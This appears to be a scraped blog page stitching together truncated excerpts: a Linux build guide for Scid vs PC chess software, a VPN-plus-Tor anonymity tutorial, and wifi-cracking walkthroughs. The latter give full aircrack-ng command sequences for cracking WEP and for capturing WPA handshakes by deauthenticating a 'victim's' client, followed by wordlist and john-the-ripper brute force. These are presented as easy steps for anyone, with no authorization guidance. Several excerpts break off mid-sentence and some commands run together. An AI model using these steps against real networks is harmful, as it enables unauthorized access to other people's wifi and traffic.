Scid vs PC
Scid vs PC is definitely the best and most comprehensive chess software for Linux. Unfortunately I struggled quite a bit to get it up and running.
Before I start: You might prefer to watch the video. Otherwise keep on reading.
Open a terminal and execute the following commandssudo apt-get install auto-apt build-essential
sudo auto-apt update-local
sudo auto-apt update
sudo auto-apt updatedbNow make sure you got both tcl8.5-dev and tk8.5-dev installedsudo apt-get install tcl8.5-dev tcl8.5
sudo apt-get install tk8.5-dev tk8.5 Some users are reporting problems on Ubuntu 14.04. sudo apt-get install tcl8.6-dev tcl8.6
sudo apt-get install tk8.6-dev tk8.6 libgcj15-dev The 'x' refers to the current release: e.g. 4.9.tgz
download scid vs pc: http://sourceforge.net/projects/scidvspc/files/source/scid_vs_pc-4.9.tgz/download tar -xzf scid_vs_pc-4.xx.tgz
sudo auto-apt run ./configure
sudo auto-apt run make
sudo auto-apt run make install
This should work. If you en…
Summary: Tor Browser is not enough. This short tutorial will help you to significantly improve your security in only 15 minutes.
Your online privacy is under attack. Government agencies (NSA, FBI etc.) and private companies (e.g. Google) are snooping on you. You will find a lot of tips on the web to achieve online anonymity, but most of it is useless.
The information below will give you a rock-solid setup in a reasonable amount of time. If you run into any problems post a comment and I will help you out.
It is possible to avoid being tracked, but to stay anonymous online you need a) a good setup and b) use your common sense.
My setup | User -> VPN -> Tor -> Internet
Using Tor alone is often not enough as a Harvard student had to learn when he emailed a bomb threat to campus officials to avoid having to write a final exam. He was deanonymized by the fact that he was the only person using Tor on the campus network at the time the email was sent.
A VPN will hi…
The limitation of a dictionary attack is that unless the password is in your dictionary file, your attack won't be successful. Another way to obtain the password is to brute force it with john the ripper. In theory it is possible to crack ANY password with this method, but it might take a million years to crack a full 128 ASCII characters password with your computer.
Ok, the command:
This was on Backtrack /pentest/password/jtr/john --stdout --incremental:all | aircrack-ng -b (bssid) -w file.cap (wpa handshake file)
Anybody should be able to do this. If you struggle with something, post a comment and I' ll get back to you.
- Backtrack (or Linux with aircrack-ng installed)
- Virtual machine (e.g. Vmware or Virtualbox)
- USB Wifi adapter (you will need a wifi adapter which you can put in promiscuous mode. It wont work with your built-in notebook wifi card etc.) Buy this one: Alfa AWUS036H . It is cheap, reliable and works out of the box.
Commands airmon-ng stop wlan0ifconfig wlan0 downmacchanger -m 00:11:22:33:44:55 wlan0ifconfig wlan0 upairmon-ng start wlan0 ifconfig mon0 downmacchanger -r (random mac) mon0ifconfig mon0 upairodump-ng mon0 (scan for APs)Wait for a minuteCTRL + C (stop scanning)Pick your own AP with WEP encryptionairodump-ng -c (channel) -w (filename) —bssid (xx:xx:xx:xx:xx:xx) mon0-w file, in which the data will be saved.—You need around 10k of data to successfully crack WEP—Open another consoleaireplay-ng -1 0 -a (BSSID) -e (ESSID) mon0Wait for ”Association succcess…
What you needBacktrack (or Linux with aircrack-ng installed)Virtual machine (e.g. Vmware or Virtualbox)Password listUSB Wifi adapter capable of promiscuous mode: Alfa AWUS036H
Alright, fire up the terminal.
Commands airmon-ngairmon-ng start wlan0ifconfig mon0 downmacchanger -m 00:11:22:33:44:55 mon0ifconfig mon0 upairodump-ng mon0 (let it scan for a minute)CTRL + C (stop)airodump-ng -c (channel) -w (filename. eg. wpa) —bssid (xx:xx:xx:xx:xx:xx) mon0Now, we need to deauthenticate a user's pc currently on the network (mac)open another consoleaireplay-ng --deauth 1 (just one!) -e (ESSID) -c (victim's mac) mon0Wait for WPA handshake ==> airodump-ng—-all cracking can be done offline—-aircrack-ng -w (wordlist) file (eg. WPA-01.cap)this is the file from step 8
Note: Success of attack depends on whether your word-list contains the password or not.